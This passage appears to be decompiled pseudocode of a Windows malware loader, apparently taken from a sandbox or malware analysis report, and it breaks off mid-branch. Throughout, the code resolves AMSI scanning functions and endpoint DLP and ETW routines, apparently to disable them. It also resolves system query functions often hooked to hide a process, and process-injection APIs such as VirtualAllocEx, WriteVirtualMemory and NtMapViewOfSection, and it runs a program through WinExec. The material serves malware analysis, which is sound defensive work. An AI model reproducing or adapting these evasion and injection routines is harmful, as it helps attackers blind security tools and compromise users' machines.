						_t2752 =  *0x28a6574; // 0x7ed60018, executed
						E0286C5D0(_t2752, _t4897,  &_v2192, _t2751, _t6275); // executed
						E028544F4(0x28a6570, _v2192);
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("Initialize");
						E02854824();
						E02854698( &_v2196, E02854964(_v2200));
						_push(_v2196);
						_t4969 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v2208, _t4969, 0x2874c4c);
						E02854698( &_v2204, E02854964(_v2208));
						_pop(_t5493); // executed
						E02867B80(_v2204, _t5493); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("OpenSession");
						E02854824();
						E02854698( &_v2212, E02854964(_v2216));
						_push(_v2212);
						_t4970 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v2224, _t4970, 0x2874c4c);
						E02854698( &_v2220, E02854964(_v2224));
						_pop(_t5498); // executed
						E02867B80(_v2220, _t5498); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("ScanBuffer");
						E02854824();
						E02854698( &_v2228, E02854964(_v2232));
						_push(_v2228);
						_t4971 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v2240, _t4971, 0x2874c4c);
						E02854698( &_v2236, E02854964(_v2240));
						_pop(_t5503); // executed
						E02867B80(_v2236, _t5503); // executed
						_t2798 =  *0x28a6570; // 0x7ecd0018
						E02867C68(_t2798, _t4971,  &_v2248);
						E0286C56C(_v2248, _t4971,  &_v2244);
						E028544F4(0x28a65c4, _v2244);
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("Initialize");
						E02854824();
						E02854698( &_v2252, E02854964(_v2256));
						_push(_v2252);
						_t4972 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v2264, _t4972, 0x2874c4c);
						E02854698( &_v2260, E02854964(_v2264));
						_pop(_t5511); // executed
						E02867B80(_v2260, _t5511); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("OpenSession");
						E02854824();
						E02854698( &_v2268, E02854964(_v2272));
						_push(_v2268);
						_t4973 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v2280, _t4973, 0x2874c4c);
						E02854698( &_v2276, E02854964(_v2280));
						_pop(_t5516); // executed
						E02867B80(_v2276, _t5516); // executed
						_push(0x2874c4c);
						_push( *0x28a65fc);
						_push("ScanString");
						E02854824();
						E02854698( &_v2284, E02854964(_v2288));
						_push(_v2284);
						_t4974 =  *0x28a65fc; // 0x29f1b38
						E028547B0( &_v2296, _t4974, 0x2874c4c);
						E02854698( &_v2292, E02854964(_v2296));
						_pop(_t5521); // executed
						E02867B80(_v2292, _t5521);
						_t2846 =  *0x28a6624; // 0x29f1bb8
						E028548B0(_t2846, 0x2874db0);
						if(__eflags != 0) {
							L32:
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("OpenSession");
							E02854824();
							E02854698( &_v3348, E02854964(_v3352));
							_push(_v3348);
							_t4975 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v3360, _t4975, 0x2874c4c);
							E02854698( &_v3356, E02854964(_v3360));
							_pop(_t5527); // executed
							E02867B80(_v3356, _t5527); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("UacInitialize");
							E02854824();
							E02854698( &_v3364, E02854964(_v3368));
							_push(_v3364);
							_t4976 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v3376, _t4976, 0x2874c4c);
							E02854698( &_v3372, E02854964(_v3376));
							_pop(_t5532); // executed
							E02867B80(_v3372, _t5532); // executed
							_push(0x2874c4c);
							_push( *0x28a65fc);
							_push("ScanBuffer");
							E02854824();
							E02854698( &_v3380, E02854964(_v3384));
							_push(_v3380);
							_t4977 =  *0x28a65fc; // 0x29f1b38
							E028547B0( &_v3392, _t4977, 0x2874c4c);
							E02854698( &_v3388, E02854964(_v3392));
							_pop(_t5537); // executed
							E02867B80(_v3388, _t5537);
							_t2890 =  *0x28a6614; // 0x29f1be8
							E028548B0(_t2890, 0x2874db0);
							if(__eflags != 0) {
								L37:
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("ScanString");
								E02854824();
								E02854698( &_v3676, E02854964(_v3680));
								_push(_v3676);
								_t4978 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v3688, _t4978, 0x2874c4c);
								E02854698( &_v3684, E02854964(_v3688));
								_pop(_t5543); // executed
								E02867B80(_v3684, _t5543); // executed
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("Initialize");
								E02854824();
								E02854698( &_v3692, E02854964(_v3696));
								_push(_v3692);
								_t4979 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v3704, _t4979, 0x2874c4c);
								E02854698( &_v3700, E02854964(_v3704));
								_pop(_t5548); // executed
								E02867B80(_v3700, _t5548); // executed
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("ScanBuffer");
								E02854824();
								E02854698( &_v3708, E02854964(_v3712));
								_push(_v3708);
								_t4980 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v3720, _t4980, 0x2874c4c);
								E02854698( &_v3716, E02854964(_v3720));
								_pop(_t5553); // executed
								E02867B80(_v3716, _t5553);
								_t2934 =  *0x28a6610; // 0x29f1bd8
								E028548B0(_t2934, 0x2874db0);
								if(__eflags == 0) {
									_t3348 =  *0x28a6614; // 0x29f1be8
									E028548B0(_t3348, 0x2874d2c);
									if(__eflags == 0) {
										_push(0x2874c4c);
										_push( *0x28a65fc);
										_push("UacScan");
										E02854824();
										E02854698( &_v3724, E02854964(_v3728));
										_push(_v3724);
										_t4993 =  *0x28a65fc; // 0x29f1b38
										E028547B0( &_v3736, _t4993, 0x2874c4c);
										E02854698( &_v3732, E02854964(_v3736));
										_pop(_t5728); // executed
										E02867B80(_v3732, _t5728); // executed
										_push(0x2874c4c);
										_push( *0x28a65fc);
										_push("OpenSession");
										E02854824();
										E02854698( &_v3740, E02854964(_v3744));
										_push(_v3740);
										_t4994 =  *0x28a65fc; // 0x29f1b38
										E028547B0( &_v3752, _t4994, 0x2874c4c);
										E02854698( &_v3748, E02854964(_v3752));
										_pop(_t5733); // executed
										E02867B80(_v3748, _t5733); // executed
										_push(0x2874c4c);
										_push( *0x28a65fc);
										_push("ScanString");
										E02854824();
										E02854698( &_v3756, E02854964(_v3760));
										_push(_v3756);
										_t4995 =  *0x28a65fc; // 0x29f1b38
										E028547B0( &_v3768, _t4995, 0x2874c4c);
										E02854698( &_v3764, E02854964(_v3768));
										_pop(_t5738); // executed
										E02867B80(_v3764, _t5738); // executed
										_push( *0x28a65d0);
										_push(0x2874de8);
										_t3392 =  *0x28a6620; // 0x29f97a8
										E02867C68(_t3392, _t4995,  &_v3776);
										_push(_v3776);
										_push(0x2875048);
										_push(0);
										_push(0x2875054);
										_push(0);
										_push(0x2875060);
										E02854824();
										E02854698(0x28a6608, E02854964(_v3772));
										_push(0x2874c4c);
										_push( *0x28a65fc);
										_push("ScanString");
										E02854824();
										E02854698( &_v3780, E02854964(_v3784));
										_push(_v3780);
										_t4996 =  *0x28a65fc; // 0x29f1b38
										E028547B0( &_v3792, _t4996, 0x2874c4c);
										E02854698( &_v3788, E02854964(_v3792));
										_pop(_t5746); // executed
										E02867B80(_v3788, _t5746); // executed
										_push(0x2874c4c);
										_push( *0x28a65fc);
										_push("OpenSession");
										E02854824();
										E02854698( &_v3796, E02854964(_v3800));
										_push(_v3796);
										_t4997 =  *0x28a65fc; // 0x29f1b38
										E028547B0( &_v3808, _t4997, 0x2874c4c);
										E02854698( &_v3804, E02854964(_v3808));
										_pop(_t5751); // executed
										E02867B80(_v3804, _t5751);
										_t3427 =  *0x28a6608; // 0x29e3608
										_t3428 = E02857E40(_t3427);
										__eflags = _t3428;
										if(_t3428 == 0) {
											_push(0x2874c4c);
											_push( *0x28a65fc);
											_push("ScanBuffer");
											E02854824();
											E02854698( &_v3812, E02854964(_v3816));
											_push(_v3812);
											_t5001 =  *0x28a65fc; // 0x29f1b38
											E028547B0( &_v3824, _t5001, 0x2874c4c);
											E02854698( &_v3820, E02854964(_v3824));
											_pop(_t5773); // executed
											E02867B80(_v3820, _t5773); // executed
											_push(0x2874c4c);
											_push( *0x28a65fc);
											_push("UacScan");
											E02854824();
											E02854698( &_v3828, E02854964(_v3832));
											_push(_v3828);
											_t5002 =  *0x28a65fc; // 0x29f1b38
											E028547B0( &_v3840, _t5002, 0x2874c4c);
											E02854698( &_v3836, E02854964(_v3840));
											_pop(_t5778); // executed
											E02867B80(_v3836, _t5778); // executed
											E0286C03C(0x2877d24,  &_v3844, 0x2aeb7);
											E028544F4(0x28a659c, _v3844);
											_push(0x2874c4c);
											_push( *0x28a65fc);
											_push("UacScan");
											E02854824();
											E02854698( &_v3848, E02854964(_v3852));
											_push(_v3848);
											_t5004 =  *0x28a65fc; // 0x29f1b38
											E028547B0( &_v3860, _t5004, 0x2874c4c);
											E02854698( &_v3856, E02854964(_v3860));
											_pop(_t5785); // executed
											E02867B80(_v3856, _t5785); // executed
											_push(0x2874c4c);
											_push( *0x28a65fc);
											_push("ScanString");
											E02854824();
											E02854698( &_v3864, E02854964(_v3868));
											_push(_v3864);
											_t5005 =  *0x28a65fc; // 0x29f1b38
											E028547B0( &_v3876, _t5005, 0x2874c4c);
											E02854698( &_v3872, E02854964(_v3876));
											_pop(_t5790); // executed
											E02867B80(_v3872, _t5790); // executed
											_t5791 =  *0x28a6608; // 0x29e3608
											E02854DA4( &_v3880, _t5791);
											_push(_v3880);
											_t5792 =  *0x28a659c; // 0x28c40a8
											E02854DA4( &_v3888, _t5792);
											E02854728( &_v3884, _v3888);
											_pop(_t5794); // executed
											E0286BCF4(_v3884, _t4897, _t5794, _t6275); // executed
										}
										_push(0x2874c4c);
										_push( *0x28a65fc);
										_push("Initialize");
										E02854824();
										E02854698( &_v3892, E02854964(_v3896));
										_push(_v3892);
										_t4998 =  *0x28a65fc; // 0x29f1b38
										E028547B0( &_v3904, _t4998, 0x2874c4c);
										E02854698( &_v3900, E02854964(_v3904));
										_pop(_t5756); // executed
										E02867B80(_v3900, _t5756); // executed
										_push(0x2874c4c);
										_push( *0x28a65fc);
										_push("ScanBuffer");
										E02854824();
										E02854698( &_v3908, E02854964(_v3912));
										_push(_v3908);
										_t4999 =  *0x28a65fc; // 0x29f1b38
										E028547B0( &_v3920, _t4999, 0x2874c4c);
										E02854698( &_v3916, E02854964(_v3920));
										_pop(_t5761); // executed
										E02867B80(_v3916, _t5761); // executed
										_push(0x2874c4c);
										_push( *0x28a65fc);
										_push("OpenSession");
										E02854824();
										E02854698( &_v3924, E02854964(_v3928));
										_push(_v3924);
										_t5000 =  *0x28a65fc; // 0x29f1b38
										E028547B0( &_v3936, _t5000, 0x2874c4c);
										E02854698( &_v3932, E02854964(_v3936));
										_pop(_t5766); // executed
										E02867B80(_v3932, _t5766); // executed
										_push(E028549BC(0x28a65c4));
										_t3473 =  *0x28a6608; // 0x29e3608
										E02854698( &_v3940, E02854964(_t3473));
										_pop(_t5768); // executed
										E02869D28(_v3940, _t4897, _t5768, _t6274, _t6275, _t6295); // executed
									}
								}
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("Initialize");
								E02854824();
								E02854698( &_v3944, E02854964(_v3948));
								_push(_v3944);
								_t4981 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v3956, _t4981, 0x2874c4c);
								E02854698( &_v3952, E02854964(_v3956));
								_pop(_t5559); // executed
								E02867B80(_v3952, _t5559); // executed
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("ScanString");
								E02854824();
								E02854698( &_v3960, E02854964(_v3964));
								_push(_v3960);
								_t4982 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v3972, _t4982, 0x2874c4c);
								E02854698( &_v3968, E02854964(_v3972));
								_pop(_t5564); // executed
								E02867B80(_v3968, _t5564); // executed
								E02854698( &_v3976, "BCryptVerifySignature");
								_push(_v3976);
								E02854698( &_v3980, "bcrypt");
								_pop(_t5567); // executed
								E02867B80(_v3980, _t5567); // executed
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("OpenSession");
								E02854824();
								E02854698( &_v3984, E02854964(_v3988));
								_push(_v3984);
								_t4983 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v3996, _t4983, 0x2874c4c);
								E02854698( &_v3992, E02854964(_v3996));
								_pop(_t5572); // executed
								E02867B80(_v3992, _t5572); // executed
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("Initialize");
								E02854824();
								E02854698( &_v4000, E02854964(_v4004));
								_push(_v4000);
								_t4984 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v4012, _t4984, 0x2874c4c);
								E02854698( &_v4008, E02854964(_v4012));
								_pop(_t5577); // executed
								E02867B80(_v4008, _t5577); // executed
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("ScanBuffer");
								E02854824();
								E02854698( &_v4016, E02854964(_v4020));
								_push(_v4016);
								_t4985 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v4028, _t4985, 0x2874c4c);
								E02854698( &_v4024, E02854964(_v4028));
								_pop(_t5582); // executed
								E02867B80(_v4024, _t5582); // executed
								E02854698( &_v4032, "DlpNotifyPreDragDrop");
								_push(_v4032);
								E02854698( &_v4036, "endpointdlp");
								_pop(_t5585); // executed
								E02867B80(_v4036, _t5585); // executed
								E02854698( &_v4040, "DlpCheckIsCloudSyncApp");
								_push(_v4040);
								E02854698( &_v4044, "endpointdlp");
								_pop(_t5588); // executed
								E02867B80(_v4044, _t5588); // executed
								E02854698( &_v4048, "DlpGetArchiveFileTraceInfo");
								_push(_v4048);
								E02854698( &_v4052, "endpointdlp");
								_pop(_t5591); // executed
								E02867B80(_v4052, _t5591); // executed
								E02854698( &_v4056, "DlpGetWebSiteAccess");
								_push(_v4056);
								E02854698( &_v4060, "endpointdlp");
								_pop(_t5594); // executed
								E02867B80(_v4060, _t5594); // executed
								E02854698( &_v4064, "NtAlertResumeThread");
								_push(_v4064);
								E02854698( &_v4068, "ntdll");
								_pop(_t5597);
								E02867B80(_v4068, _t5597);
								E02854698( &_v4072, "RtlAllocateHeap");
								_push(_v4072);
								E02854698( &_v4076, "ntdll");
								_pop(_t5600);
								E02867B80(_v4076, _t5600);
								E02854698( &_v4080, "NtWaitForSingleObject");
								_push(_v4080);
								E02854698( &_v4084, "ntdll");
								_pop(_t5603);
								E02867B80(_v4084, _t5603);
								E02854698( &_v4088, "RtlAllocateHeap");
								_push(_v4088);
								E02854698( &_v4092, "ntdll");
								_pop(_t5606);
								E02867B80(_v4092, _t5606);
								E02854698( &_v4096, "RtlCreateQueryDebugBuffer");
								_push(_v4096);
								E02854698( &_v4100, "ntdll");
								_pop(_t5609);
								E02867B80(_v4100, _t5609);
								E02867B80(0x287517c, "NtQuerySystemInformation");
								E02867B80(0x287517c, "NtDeviceIoControlFile");
								E02867B80(0x287517c, "NtQueryDirectoryFile");
								E02867B80(0x287517c, "RtlQueryProcessDebugInformation");
								E02867B80("Advapi", "EnumServicesStatusA"); // executed
								E02867B80("Advapi", "EnumServicesStatusW"); // executed
								E02867B80("Advapi", "EnumServicesStatusExA"); // executed
								E02867B80("Advapi", "EnumServicesStatusExW"); // executed
								E02867B80(0x2875298, "EnumProcessModules"); // executed
								E02867B80("Kernel32", "CreateProcessA");
								E02867B80("Kernel32", "CreateProcessW");
								E02867B80("Advapi", "CreateProcessAsUserA"); // executed
								E02867B80("Advapi", "CreateProcessAsUserW"); // executed
								E02867B80("Advapi", "CreateProcessWithLogonW"); // executed
								E02867B80("ws2_32", "connect");
								E02867B80("Kernel32", "CreateProcessAsUserW");
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("UacInitialize");
								E02854824();
								E02854698( &_v4104, E02854964(_v4108));
								_push(_v4104);
								_t4986 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v4116, _t4986, 0x2874c4c);
								E02854698( &_v4112, E02854964(_v4116));
								_pop(_t5630); // executed
								E02867B80(_v4112, _t5630); // executed
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("OpenSession");
								E02854824();
								E02854698( &_v4120, E02854964(_v4124));
								_push(_v4120);
								_t4987 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v4132, _t4987, 0x2874c4c);
								E02854698( &_v4128, E02854964(_v4132));
								_pop(_t5635); // executed
								E02867B80(_v4128, _t5635); // executed
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("ScanString");
								E02854824();
								E02854698( &_v4136, E02854964(_v4140));
								_push(_v4136);
								_t4988 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v4148, _t4988, 0x2874c4c);
								E02854698( &_v4144, E02854964(_v4148));
								_pop(_t5640); // executed
								E02867B80(_v4144, _t5640); // executed
								E02854698( &_v4152, "VirtualAlloc");
								_push(_v4152);
								E02854698( &_v4156, "kernel32");
								_pop(_t5643);
								E02867B80(_v4156, _t5643);
								E02854698( &_v4160, "VirtualAllocEx");
								_push(_v4160);
								E02854698( &_v4164, "kernel32");
								_pop(_t5646);
								E02867B80(_v4164, _t5646);
								E02854698( &_v4168, "VirtualProtect");
								_push(_v4168);
								E02854698( &_v4172, "kernel32");
								_pop(_t5649);
								E02867B80(_v4172, _t5649);
								E02854698( &_v4176, "OpenProcess");
								_push(_v4176);
								E02854698( &_v4180, "kernel32");
								_pop(_t5652);
								E02867B80(_v4180, _t5652);
								E02854698( &_v4184, "WriteVirtualMemory");
								_push(_v4184);
								E02854698( &_v4188, "kernel32");
								_pop(_t5655);
								E02867B80(_v4188, _t5655);
								E02854698( &_v4192, "FlushInstructionCache");
								_push(_v4192);
								E02854698( &_v4196, "kernel32");
								_pop(_t5658);
								E02867B80(_v4196, _t5658);
								E02854698( &_v4200, "SetUnhandledExceptionFilter");
								_push(_v4200);
								E02854698( &_v4204, "kernel32");
								_pop(_t5661);
								E02867B80(_v4204, _t5661);
								E02854698( &_v4208, "NtGetWriteWatch");
								_push(_v4208);
								E02854698( &_v4212, "ntdll");
								_pop(_t5664);
								E02867B80(_v4212, _t5664);
								E02854698( &_v4216, "NtQueryVirtualMemory");
								_push(_v4216);
								E02854698( &_v4220, "ntdll");
								_pop(_t5667);
								E02867B80(_v4220, _t5667);
								E02854698( &_v4224, "NtQueryInformationThread");
								_push(_v4224);
								E02854698( &_v4228, "ntdll");
								_pop(_t5670);
								E02867B80(_v4228, _t5670);
								E02854698( &_v4232, "NtOpenSection");
								_push(_v4232);
								E02854698( &_v4236, "ntdll");
								_pop(_t5673);
								E02867B80(_v4236, _t5673);
								E02854698( &_v4240, "NtCreateSection");
								_push(_v4240);
								E02854698( &_v4244, "ntdll");
								_pop(_t5676);
								E02867B80(_v4244, _t5676);
								E02854698( &_v4248, "NtMapViewOfSection");
								_push(_v4248);
								E02854698( &_v4252, "ntdll");
								_pop(_t5679);
								E02867B80(_v4252, _t5679);
								E02854698( &_v4256, "NtReadVirtualMemory");
								_push(_v4256);
								E02854698( &_v4260, "ntdll");
								_pop(_t5682);
								E02867B80(_v4260, _t5682);
								E02854698( &_v4264, "NtQuerySecurityObject");
								_push(_v4264);
								E02854698( &_v4268, "ntdll");
								_pop(_t5685);
								E02867B80(_v4268, _t5685);
								E02854698( &_v4272, "NtAccessCheck");
								_push(_v4272);
								E02854698( &_v4276, "ntdll");
								_pop(_t5688);
								E02867B80(_v4276, _t5688);
								E02854698( &_v4280, "LdrLoadDll");
								_push(_v4280);
								E02854698( &_v4284, "ntdll");
								_pop(_t5691);
								E02867B80(_v4284, _t5691);
								E02854698( &_v4288, "LdrGetProcedureAddress");
								_push(_v4288);
								E02854698( &_v4292, "ntdll");
								_pop(_t5694);
								E02867B80(_v4292, _t5694);
								E02854698( &_v4296, "NtWriteVirtualMemory");
								_push(_v4296);
								E02854698( &_v4300, "ntdll");
								_pop(_t5697);
								E02867B80(_v4300, _t5697);
								E02854698( &_v4304, "NtOpenFile");
								_push(_v4304);
								E02854698( &_v4308, "ntdll");
								_pop(_t5700);
								E02867B80(_v4308, _t5700);
								E02854698( &_v4312, "EtwEventWriteEx");
								_push(_v4312);
								E02854698( &_v4316, "ntdll");
								_pop(_t5703);
								E02867B80(_v4316, _t5703);
								E02854698( &_v4320, "EtwEventWrite");
								_push(_v4320);
								E02854698( &_v4324, "ntdll");
								_pop(_t5706);
								E02867B80(_v4324, _t5706);
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("Initialize");
								E02854824();
								E02854698( &_v4328, E02854964(_v4332));
								_push(_v4328);
								_t4989 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v4340, _t4989, 0x2874c4c);
								E02854698( &_v4336, E02854964(_v4340));
								_pop(_t5711); // executed
								E02867B80(_v4336, _t5711); // executed
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("ScanBuffer");
								E02854824();
								E02854698( &_v4344, E02854964(_v4348));
								_push(_v4344);
								_t4990 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v4356, _t4990, 0x2874c4c);
								E02854698( &_v4352, E02854964(_v4356));
								_pop(_t5716); // executed
								E02867B80(_v4352, _t5716); // executed
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("OpenSession");
								E02854824();
								E02854698( &_v4360, E02854964(_v4364));
								_push(_v4360);
								_t4991 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v4372, _t4991, 0x2874c4c);
								E02854698( &_v4368, E02854964(_v4372));
								_pop(_t5721); // executed
								E02867B80(_v4368, _t5721); // executed
								E02867B24(GetCurrentProcess(), "NtOpenProcess");
								ExitProcess(0); // executed
								goto L43;
							} else {
								_t3548 =  *0x28a6610; // 0x29f1bd8
								E028548B0(_t3548, 0x2874d2c);
								if(__eflags != 0) {
									goto L37;
								} else {
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("OpenSession");
									E02854824();
									E02854698( &_v3396, E02854964(_v3400));
									_push(_v3396);
									_t5006 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3408, _t5006, 0x2874c4c);
									E02854698( &_v3404, E02854964(_v3408));
									_pop(_t5800);
									E02867B80(_v3404, _t5800);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("ScanString");
									E02854824();
									E02854698( &_v3412, E02854964(_v3416));
									_push(_v3412);
									_t5007 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3424, _t5007, 0x2874c4c);
									E02854698( &_v3420, E02854964(_v3424));
									_pop(_t5805);
									E02867B80(_v3420, _t5805);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("OpenSession");
									E02854824();
									E02854698( &_v3428, E02854964(_v3432));
									_push(_v3428);
									_t5008 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3440, _t5008, 0x2874c4c);
									E02854698( &_v3436, E02854964(_v3440));
									_pop(_t5810);
									E02867B80(_v3436, _t5810);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("ScanString");
									E02854824();
									E02854698( &_v3444, E02854964(_v3448));
									_push(_v3444);
									_t5009 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3456, _t5009, 0x2874c4c);
									E02854698( &_v3452, E02854964(_v3456));
									_pop(_t5815);
									E02867B80(_v3452, _t5815);
									_t5010 =  *0x28a6578; // 0x29ea858
									E028547B0( &_v3460, _t5010, "C:\\Windows\\System32\\");
									WinExec(E02854964(_v3460), 0);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("ScanBuffer");
									E02854824();
									E02854698( &_v3464, E02854964(_v3468));
									_push(_v3464);
									_t5011 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3476, _t5011, 0x2874c4c);
									E02854698( &_v3472, E02854964(_v3476));
									_pop(_t5821);
									E02867B80(_v3472, _t5821);
									_t3625 =  *0x28a6578; // 0x29ea858
									E02854698( &_v3480, E02854964(_t3625));
									E02867FE4(_v3480, _t4897, 0x28a65dc, _t6274, _t6275, __eflags);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("OpenSession");
									E02854824();
									E02854698( &_v3484, E02854964(_v3488));
									_push(_v3484);
									_t5012 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3496, _t5012, 0x2874c4c);
									E02854698( &_v3492, E02854964(_v3496));
									_pop(_t5828);
									E02867B80(_v3492, _t5828);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("ScanBuffer");
									E02854824();
									E02854698( &_v3500, E02854964(_v3504));
									_push(_v3500);
									_t5013 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3512, _t5013, 0x2874c4c);
									E02854698( &_v3508, E02854964(_v3512));
									_pop(_t5833);
									E02867B80(_v3508, _t5833);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("OpenSession");
									E02854824();
									E02854698( &_v3516, E02854964(_v3520));
									_push(_v3516);
									_t5014 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3528, _t5014, 0x2874c4c);
									E02854698( &_v3524, E02854964(_v3528));
									_pop(_t5838);
									E02867B80(_v3524, _t5838);
									 *0x28a6538 = E02853694(1);
									_push(_t6277);
									_push(0x287330b);
									_push( *[fs:edx]);
									 *[fs:edx] = _t6278;
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("ScanBuffer");
									E02854824();
									E02854698( &_v3532, E02854964(_v3536));
									_push(_v3532);
									_t5015 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3544, _t5015, 0x2874c4c);
									E02854698( &_v3540, E02854964(_v3544));
									_pop(_t5845);
									E02867B80(_v3540, _t5845);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("OpenSession");
									E02854824();
									E02854698( &_v3548, E02854964(_v3552));
									_push(_v3548);
									_t5016 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3560, _t5016, 0x2874c4c);
									E02854698( &_v3556, E02854964(_v3560));
									_pop(_t5850);
									E02867B80(_v3556, _t5850);
									_t3703 =  *0x28a65c4; // 0x7ebd0018
									_v1016 = _t3703;
									_t5017 = _v1016;
									__eflags = _t5017;
									if(_t5017 != 0) {
										_t5028 = _t5017 - 4;
										__eflags = _t5028;
										_t5017 =  *_t5028;
									}
									asm("cdq");
									_t3705 =  *0x28a6538; // 0x0
									E0286593C(_t3705, _t5017, _t5850);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("ScanBuffer");
									E02854824();
									E02854698( &_v3564, E02854964(_v3568));
									_push(_v3564);
									_t5018 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3576, _t5018, 0x2874c4c);
									E02854698( &_v3572, E02854964(_v3576));
									_pop(_t5855);
									E02867B80(_v3572, _t5855);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("OpenSession");
									E02854824();
									E02854698( &_v3580, E02854964(_v3584));
									_push(_v3580);
									_t5019 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3592, _t5019, 0x2874c4c);
									E02854698( &_v3588, E02854964(_v3592));
									_pop(_t5860);
									E02867B80(_v3588, _t5860);
									_t3735 =  *0x28a6538; // 0x0
									_t3736 =  *((intOrPtr*)( *_t3735))();
									_t5862 =  *0x28a65c4; // 0x7ebd0018
									_t3737 =  *0x28a6538; // 0x0
									E02865AE4(_t3737, _t3736 + _t3736 + _t3736 + _t3736, _t5862);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("ScanBuffer");
									E02854824();
									E02854698( &_v3596, E02854964(_v3600));
									_push(_v3596);
									_t5023 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3608, _t5023, 0x2874c4c);
									E02854698( &_v3604, E02854964(_v3608));
									_pop(_t5867);
									E02867B80(_v3604, _t5867);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("OpenSession");
									E02854824();
									E02854698( &_v3612, E02854964(_v3616));
									_push(_v3612);
									_t5024 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3624, _t5024, 0x2874c4c);
									E02854698( &_v3620, E02854964(_v3624));
									_pop(_t5872);
									E02867B80(_v3620, _t5872);
									_push(0x2874c4c);
									_push( *0x28a65fc);
									_push("ScanBuffer");
									E02854824();
									E02854698( &_v3628, E02854964(_v3632));
									_push(_v3628);
									_t5025 =  *0x28a65fc; // 0x29f1b38
									E028547B0( &_v3640, _t5025, 0x2874c4c);
									E02854698( &_v3636, E02854964(_v3640));
									_pop(_t5877);
									E02867B80(_v3636, _t5877);
									_t3781 =  *0x28a65dc; // 0x0
									_t3782 =  *0x28a6538; // 0x0
									E02868328(_t4897, _t6274, _t6275, _t3782, _t3781);
									__eflags = 0;
									_pop(_t5878);
									 *[fs:eax] = _t5878;
									_push(0x2873312);
									_t3785 =  *0x28a6538; // 0x0
									return E028536C4(_t3785);
								}
							}
						} else {
							_push( *0x28a65d0);
							_push(0x2874de8);
							_push(0x2874ec4);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x2874ed0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x2874eb8);
							E02854824();
							E02854698( &_v2300, E02854964(_v2304));
							_t3793 = E02857E40(_v2300);
							__eflags = _t3793;
							if(_t3793 != 0) {
								goto L32;
							} else {
								_push(0x2874c4c);
								_push( *0x28a65fc);
								_push("ScanString");
								E02854824();
								E02854698( &_v2308, E02854964(_v2312));
								_push(_v2308);
								_t5029 =  *0x28a65fc; // 0x29f1b38
								E028547B0( &_v2320, _t5029, 0x2874c4c);
								E02854698( &_v2316, E02854964(_v2320));
								_pop(_t5885); // executed
								E02867B80(_v2316, _t5885); // executed
								E02854698( &_v2324, "C:\\Windows\\SysWOW64");
								_t3811 = E02857E64(_v2324);
								__eflags = _t3811;
								if(_t3811 == 0) {
									goto L32;
								} else {
